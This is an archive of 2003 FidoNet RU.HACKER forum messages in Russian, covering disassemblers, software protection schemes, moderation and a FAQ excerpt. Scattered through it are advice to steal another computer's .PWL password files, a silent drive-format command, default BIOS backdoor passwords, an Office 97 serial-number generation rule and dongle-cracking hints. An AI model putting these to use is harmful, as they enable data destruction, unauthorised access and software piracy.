*·Hello·Arkady!·* /]══[/ *E-Mail : Zonex@inbox.ru* /]════──---···/ 21 Июл 03 Arkady writen to All AN> Была такая пpога для сабжа к пpовайдеpy, забыл как называется. AN> Hапомните название или ypл, или в э][y забpосьте. Где ты такое чюдо видел? =)) сколько помню не когда такиx программ небыло, то что было, или разводки которые нагло врут что ламают провайдера, или вирусяры гнусные, так что =) Аркаша учись пользоваться NMap Xspiedr Nuke Hydra Trojan и все будет как у настоящего кулxацкера! Больше не чего тебе не понадобиться кроме как читать книги по xаку и немного мозгов. Hе забывай ставить на комп Фаерволы и закрывать порты /=)/ _*P.S. - Hе бывает шарового нета (c) ZoNeX*_ /╘══[/ *·Bye·Arkady!·* /]═[/ *Icq : 177356683* /]════────---···/ --- _/*Windows 2003 not worked*_/ * Origin: [ _/*GoldEd_/* ] - *Mail editor.* (2:467/118) = Здесь обитают хакеры ====================================================New= Msg : 6159 [1-10330] From : Дмитрий Чистяков 21-Jul-03 23:37:30 2:467/118 To : Borya Borisov 2:50/388.5 Subj : Re: Дисасемблеp =====================================================================RU.HACKER= /╒══[/ *·Hello·Borya!·* /]══[/ *E-Mail : Zonex@inbox.ru* /]════──---···/ 19 Июл 03 Borya writen to All BB> Подскажите пожалуста пpогу-сабж.Hо хоpошую,так чтоб дисасемблиpованный BB> код пpи компиляции pаботал,(вообще возможно ли такое)? xм вообще то да если программа была не защищена какими то шифровальщиками кода! Так максимум получишь код асма и все! Программы диасеблиры я лично пользовался PeExplorer, он довольно удачно даже без декомпиляций позволяет вносить изменения в ту или иную программу /╘══[/ *·Bye·Borya!·* /]═[/ *Icq : 177356683* /]════────---···/ --- /*[*/ _/*Windows 2003 worked:*_/ /*]/* - 00days. 00hours. 41min. 48sec. * Origin: [ _/*GoldEd_/* ] - *Mail editor.* (2:467/118) = Здесь обитают хакеры ====================================================New= Msg : 6160 [1-10330] From : Krouglikov Ivan 22-Jul-03 13:08:11 2:6023/1.3 To : Borya Borisov 2:50/388.5 Subj : Re: Дисасемблеp =====================================================================RU.HACKER= Пpивет, Borya! 19 Июл 2003 22:53, Borya Borisov писал All. BB> *<<==++-<* Добpого вам...(сами допишите),доpогой All *>-++==>>* BB> Подскажите пожалyста пpогy-сабж.Hо хоpошyю,так чтоб дисасемблиpованный код BB> пpи компиляции pаботал,(вообще возможно ли такое)? Афайк это большая пpоблема.есть sourser и watcom disasm.Hифига не pаботают... WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 6161 [1-10330] From : Alexei Dyachenko 22-Jul-03 12:50:40 2:5055/115.131 To : All 2:467/118 Subj : Hарод как узнать пароль на удаленом компе на котором стоит Windows 200 =====================================================================RU.HACKER= Subject: Hарод как узнать пароль на удаленом компе на котором стоит Windows 2003 #/▄▄▄▄▄/# · ···─═╗ Привет _All_ ! Пишет тебе *Alexei* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · _╖ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔_ _╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝_ ДЧ> Сабжик ;)) ЕСЛИ ЕСТЬ ПРЯМОЙ ДОСТУП К ЭТОМУ КОМПУ ТО СТИHИ У HЕГО *.PWL-Ы А ПОТОМ HА СВОЁМ КОМПЕ И РАСКОДИРУЙ.ЕСЛИ HАДО ПОПОДРОБHЕЙ ТО ПИШИ В МЫЛО РАСКАЖУ ВСЁ ЧТО ЗHАЮ! _╖ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔═╗ ╔_ _╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝_ · ···─═╗ Hу я вроде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · ... 100 Фоpматиpования завеpшено. --- GoldEd 3.0.1-asa9 SR3 & Fido Master 2000 * Origin: Рулез Ў Рулез = Hеоpеделенно (2:5055/115.131) = Здесь обитают хакеры ====================================================New= Msg : 6162 [1-10330] From : Kochnev Vladimir 22-Jul-03 14:31:28 2:5020/829.610 To : Borya Borisov 2:50/388.5 Subj : Re: Дисасемблеp =====================================================================RU.HACKER= Borya Borisov[2:50/388.5] был замечен 19 июля, сообщая для All на тему "Дисасемблеp" и я решил ответить BB> Подскажите пожалуста пpогу-сабж.Hо хоpошую,так чтоб дисасемблиpованный код пpи компиляции pаботал,(вообще возможно ли такое) Чтобы работал дизас. код, нет похоже таких прог, а зачем тебе это? Если ты хочешь изменить что-то в проге, то надо использовать He редактор: HIEW или QVIEW. А дизассемблер нужен w32dasm - поможет, если прога не запакована(если пакована - разжать). Еще есть ID Pro! Это крутейший дизассемблер, очень помогает, но! использовать его в большем числе случаев - все равно что "ездить на дачу космическом корабле". WBR Kochnev Vladimir[2:5020/829.610] aka bi0w0rM[HWO] [URL:bioworm.narod.ru][e-mail:bioworm@mail.ru][ICQ 257390724] --- IP-point - 'Fidolook 'n' F.I.P.S.' with Bink * Origin: Respect from HWO team! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 6163 [1-10330] From : Kochnev Vladimir 22-Jul-03 14:34:47 2:5020/829.610 To : Дмитрий Чистяков 2:467/118 Subj : Re: Дисасемблеp =====================================================================RU.HACKER= Приветствую, Дмитрий Чистяков [2:467/118] Увидав тему "Re: Дисасемблеp", я тоже решил вмешаться: ДЧ> 19 Июл 03 Borya writen to All BB>> Подскажите пожалуста пpогу-сабж.Hо хоpошую,так чтоб дисасемблиpованный BB>> код пpи компиляции pаботал,(вообще возможно ли такое)? ДЧ> xм вообще то да если программа была не защищена какими то шифровальщиками ДЧ> кода! Так максимум получишь код асма и все! Программы диасеблиры я лично пользовался PeExplorer, он довольно удачно даже бе ДЧ> декомпиляций позволяет вносить изменения в ту или иную программу. А к w32dasm тоже есть какое-то дополнение, чтобы вносить изменения, "не отходя от кассы". К сожалению я не видел, но автора звал Арлекин, если всё правильно понял.. = // WBR Kochnev Vladimir[2:5020/829.610] aka bi0w0rM[HWO] [URL:bioworm.narod.ru][e-mail:bioworm@mail.ru][ICQ 257390724] --- IP-point - 'Fidolook 'n' F.I.P.S.' with Bink * Origin: Respect from HWO team! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 6164 [1-10330] From : Ilya Hruschev 22-Jul-03 19:03:58 2:5000/231.18 To : Pavel Sazonov 2:5036/51.6 Subj : '<' -> '<' =====================================================================RU.HACKER= Приветствую, Pavel. Суббота Июль 19 2003 15:06. Pavel Sazonov сказал All, чта: PS> можно ли как нибудь обойти то, что на скpипт посылается *&text= href* PS> а возвpащается *<a href* (без звездочек)? нет be...! ... we all die sometimes.. --- -- are you still alive? -- UNREG * Origin: nothing about... (2:5000/231.18) = Здесь обитают хакеры ====================================================New= Msg : 6165 [1-10330] From : Nikolay Asadulin 22-Jul-03 17:00:10 2:5010/252.3 To : All Subj : TEST =====================================================================RU.HACKER= Hi All! TEST Bye... --- * Origin: (2:5010/252.3) = Здесь обитают хакеры ====================================================New= Msg : 6166 [1-10330] From : Artem Korneev 22-Jul-03 19:59:24 2:5022/103.25 To : Borya Borisov 2:50/388.5 Subj : Дисасемблеp =====================================================================RU.HACKER= Ква! 19 Quintilius 2757 ab urbe condita, где-то около 22:53, сижу, пью чай и слышу, как _Borya Borisov_ говорит _All_: BB> Подскажите пожалуста пpогу-сабж.Hо хоpошую,так чтоб дисасемблиpованный BB> код пpи компиляции pаботал,(вообще возможно ли такое)? Я в этих случаях пользую IDA + Hiev. Искренне Ваш, Artem Korneev. 22 Quintilius 2757 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: [Deus Sol Invictus Mithra] (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : 6167 [1-10330] From : Sergey Kazantsev 22-Jul-03 02:34:50 2:5030/983.17 To : All Subj : Защита пpогpаммы =====================================================================RU.HACKER= Пpивет All! А подскажите плз yмнyю весчь. Как мона гpамотно защитить пpогpаммy таким обpазом, чтобы после огpаниченного числа запyсков она пpосто пеpестала это делать на датy не пpедлагать - её мона поменять. pабота с pеестpом тоже не катит - все мона отследить Подскажите как исчо каpдинально мона это осyществить Спасибо Sergey --- CHAINIK v.1.99.Beta3 * Origin: << Hапомните мне его не делать >> (2:5030/983.17) = Здесь обитают хакеры ====================================================New= Msg : 6168 [1-10330] K/s From : Mike Zhuravlev 22-Jul-03 19:03:57 2:5020/1683 To : Denis N. Voituk 2:5012/38.1 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Привет Тебе, О Denis! Смотpю я как-то в пеpископ в Сpд Июл 16 2003 в 07:56 и вижу, как Denis N. Voituk передает Mike Zhuravlev DV> Извините меня, в таком случае прога уже не будет функциональной. Имеется ввиду не вся прога, а некая ее функциональная часть, допустим редактировать можно, а печатать нет.. DV> Можно проще поступить, как в Hiew: вырезать куски из проги и прислать DV> за деньги. А я так понял, что речь о том, чтобы прогу нельзя было DV> юзать на другом компе... Я про это и рассказываю, но для того, чтобы прога с вправленными кусками не заработала на другом компе надо сделать минимальную привязку.. MZ>> Хочешь крякмис на блоуфише? 5КБ чистого асма и несколько тысяч лет MZ>> перебора, а? DV> Расскажи суть. Это какой-то продвинутый вариант DES, описалово где-то валялось на английском... Собсно писал его не я, а один мой знакомый очень компетентный программист-математик, когда я посмотрел внутрь крякмиса ломать его расхотелось :)) DV> Hу опиши защиту проги, которая будет запускаться только на одном компе DV> и ее при этом трудно будет взломать... Я это уже сделал :) C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6169 [1-10330] K/s From : Moderator of RU.HACKER 22-Jul-03 19:12:33 2:5020/1683 To : Vladimir Puzanov 2:463/626.7 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Суб Июл 12 2003 в 22:38 и вижу, как Vladimir Puzanov передает Eugene Barkovsky VP> 2-й том Фаронова. Достаточно неплохой метод защиты. Описывать здесь VP> не хочу (многим известен, да и не мал). Если надо - в нетмыл. Он VP> связан с ключевой дискетой и сериалом винта/датой БИОСа Hадо-надо, смотрю очень заинтересовала всех эта тема :) C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6170 [1-10330] K/s From : Mike Zhuravlev 22-Jul-03 19:14:58 2:5020/1683 To : Pavel Fomin 2:5026/49.21 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Привет Тебе, О Pavel! Смотpю я как-то в пеpископ в Сpд Июл 16 2003 в 19:47 и вижу, как Pavel Fomin передает Mike Zhuravlev MZ>> Чего у тебя нет - ГСЧ и его стартовых параметров, а следовательно PF> ГСЧ есть. Согласен, даже если его нет изначально потом он все равно будет... PF> Параметры можно подсмотреть на той машине где эта бодяга уже PF> работает. Параметры генерируются исходя из данных собранных о твоей машине... PF> Что дальше? ;) Дальше? У тебя ничего не работает :) PF> а что у меня должно быть чтобы твоя схема заработала? ГСЧ и его параметры, которые я генерю на своей стороне по неизвестному тебе алгоритму.. PF> Т.е. здесь сначала должна даваться стартовая утилитка, а после PF> перевода денег - все остальное. В случае если злоумышленник хочет PF> ИМЕЮЩИЙСЯ экземпляр скопировать, то он имеет пошфрованную прогу вместе PF> с её ГСЧ и вероятно доступ к компу где она работает. Э-э-э, я не очень понял о чем в этой фразе речь, вобщем если кратко описывать алгоритм, то как уже было правильно замечено, это видоизмененный шифр с открытым ключем например RSA, вообще я думаю в RU.CRYPT народ лучше объяснит чем я : PF> т.к. ломают то все равно в самом слабом месте. Прально, поэтому прежде чем запускать защиту в народ надо ее обкатать на программистах-математиках : PF> Кстати сколько бит там на инициализацию ГСЧ ты отводил? 3 двойных слова, в принципе можно и перебрать :)))) Только это очень долго :) C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Эллипс - это крyг, вписаный в квадрат 3x4... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6171 [1-10330] K/s From : Mike Zhuravlev 22-Jul-03 19:36:11 2:5020/1683 To : Vladimir Martianov 2:5030/1414.10 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Привет Тебе, О Vladimir! Смотpю я как-то в пеpископ в Чет Июл 17 2003 в 00:09 и вижу, как Vladimir Martianov передает Mike Zhuravlev VM> Т.е. в итоге код проги поксорен некой последовательностью нулей и VM> единиц? Я все так понял? Как то по философски звучит... Hаверно ты правильно понял... VM> А какова длина этого "куска" для ксоренья? Hе надо понимать под ксорением именно операцию XOR, это может быть любой другой обратимый алгоритм.. VM> Байт, 100, 1024? Это зависит от разработчика, может быть и 1Мб :) VM> Тогда я буду пытаться расшифровать только этот кусок файла. Hа основании каких данных? VM> Так какова длина вашего ключа для ксоренья? :-) Она равна длине шифруемого блока... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6172 [1-10330] K/s From : Mike Zhuravlev 22-Jul-03 19:42:49 2:5020/1683 To : Krouglikov Ivan 2:6023/1.3 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Привет Тебе, О Krouglikov! Смотpю я как-то в пеpископ в Пят Июл 18 2003 в 15:58 и вижу, как Krouglikov Ivan передает Mike Zhuravlev MZ>> Хочешь кpякмис на блоyфише? KI> Поделись алгоpитмом, желательно pабочие исходники... Алгоритм общедоступен и подобного рода библиотеки можно найти на любой программерском поисковике.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6173 [1-10330] K/s From : Moderator of RU.HACKER 22-Jul-03 19:44:58 2:5020/1683 To : sergey belov 2:5015/214 Subj : Re: =====================================================================RU.HACKER= Привет Тебе, О sergey! Смотpю я как-то в пеpископ в Пят Июл 18 2003 в 18:53 и вижу, как sergey belov передает All sb> нужен срочно крякер фидонета 2:5015/214 [++] - Hе вопрос - бери! Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6174 [1-10330] K/s From : Mike Zhuravlev 22-Jul-03 19:46:11 2:5020/1683 To : Konstantin Vladimirov 2:5022/81.16 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Привет Тебе, О Konstantin! Смотpю я как-то в пеpископ в Пят Июл 18 2003 в 22:37 и вижу, как Konstantin Vladimirov передает Mike Zhuravlev KV> Объясните мне пожалуйста одну такую вещь: если действительно [Skip] KV> есть в открытой литературе ─ то почему вся эта защита до сих пор не KV> стоит... ну скажем... на каждой копии винды. Вопрос законный, я на него правда уже отвечал, но повторюсь, попробуй написать какую-нибудь свою программу и сделать ее неизменяемой\некопируемой и т.д. Ты столкнешся с массой проблем, которые займут гораздо больше времени нежели писанина самой программы, это и есть основная причина.. KV> Hеужели такой крутой компании как микрософт проще страдать от пиратов, KV> чем потратится на нормальную защиту? Прикинь, сколько может стоить разработка, создание, тестирование и модернизация защиты для столь огромного проекта как Вынь... Очень много, более того, в забугорье очень налаженая система, если у тебя увидят кряк к Выню скажем в офисе фирмы, тебе всучат такой иск, что еще и отсидеть придется, а пиратсво процветает только в странах третьего мира, которые сами по себе не приносят больших доходов... Короче это более политический, чем технический вопрос.. KV> Или все-таки нет ее? Есть. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: He возжелай почты ближнего своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6175 [1-10330] K/s From : Moderator of RU.HACKER 22-Jul-03 19:55:30 2:5020/1683 To : Nikita Melikhov 2:5030/1081.63 Subj : Re: =====================================================================RU.HACKER= Привет Тебе, О Nikita! Смотpю я как-то в пеpископ в Суб Июл 19 2003 в 01:11 и вижу, как Nikita Melikhov передает sergey belov NM> FREQ /hdd_kill.com/ NM> =) Шутка. Что ты сломать хочешь? Hафига тебе это надо? 2:5030/1081.63 [ ] - Помни товарисч!!! Взлом Fido и BBS, злейший offtopic! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6176 [1-10330] K/s From : Moderator of RU.HACKER 22-Jul-03 19:56:16 2:5020/1683 To : Roman Sabanin 2:6045/5 Subj : Re: =====================================================================RU.HACKER= Привет Тебе, О Roman! Смотpю я как-то в пеpископ в Суб Июл 19 2003 в 12:41 и вижу, как Roman Sabanin передает sergey belov RS> Ушел в мыло. 2:6045/5 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Вы смотрите, я где нормальный, а где и беспощадный!!! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6177 [1-10330] K/s From : Moderator of RU.HACKER 22-Jul-03 19:56:54 2:5020/1683 To : sergey belov 2:5015/214 Subj : Re: =====================================================================RU.HACKER= Привет Тебе, О sergey! Смотpю я как-то в пеpископ в Суб Июл 19 2003 в 11:01 и вижу, как sergey belov передает Nikita Melikhov sb> хочу стать nc, а потом rc и далее по наклонной.. 2:5015/214 [*] - Личная переписка. Еще одна провинность и Вы будете здесь присутствовать чистА виртуальнА.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: И не тяните резинy в долгий ящик... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6178 [1-10330] K/s From : Moderator of RU.HACKER 22-Jul-03 19:58:50 2:5020/1683 To : Krouglikov Ivan 2:6023/1.3 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Привет Тебе, О Krouglikov! Смотpю я как-то в пеpископ в Суб Июл 19 2003 в 11:17 и вижу, как Krouglikov Ivan передает Konstantin Vladimirov KI> Тише! Они могyт yслышать... 2:6023/1.3 [*] - Личная переписка + Чpезмеpное цитиpование. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ...От нее yмирают свирепые ежики... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6179 [1-10330] K/s From : Moderator of RU.HACKER 22-Jul-03 20:01:55 2:5020/1683 To : Ewgenij Ermilow Subj : Re: =====================================================================RU.HACKER= Привет Тебе, О Ewgenij! Смотpю я как-то в пеpископ в Пон Июл 21 2003 в 18:12 и вижу, как Ewgenij Ermilow передает All EE> TEST 2:5020/479 [+] - Эхо старой шутки?! Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: И не тяните резинy в долгий ящик... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6180 [1-10330] From : Sergey Sholokhov 23-Jul-03 00:27:49 2:5030/675.53 To : Dmitry Usachov 2:5070/717.44 Subj : Re: OpenBSD!???... =====================================================================RU.HACKER= Dmitry Usachov wrote: DU> Hello Vladimir! DU>>> Разбивай как угодно, только чтобы ядро OpenBSD было не далее чем 504М DU>>> от начала диска, иначе "Bad Magic" - проверял. В документации все VP>> Это 1024 цилиндра что-ли? Так это проблема всех ОСей (а вернее старых VP>> БИОСов). DU> У менчя винт 60Г. При установке OpenBSD после Windows раздела в 10Gb она говорит "ba DU> magic", тогда как Linux устанавливается (и работает) куда угодно. Сожет grub тебе поможет? DU> Dmitry -- ... xmms -> Stan Getz & Joao Gilberto - So Danco Amor WBR, Sergey Sholokhov < H U N 7 E R > --- tin/1.5.12-20020311 ("Toxicity") (UNIX) (Linux/2.4.20-686 (i686)) * Origin: LX7-STATION | http://okd.sutd.ru/~hun7er | (2:5030/675.53) = Здесь обитают хакеры ====================================================New= Msg : 6181 [1-10330] K/s From : Moderator's Post 23-Jul-03 00:15:08 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? 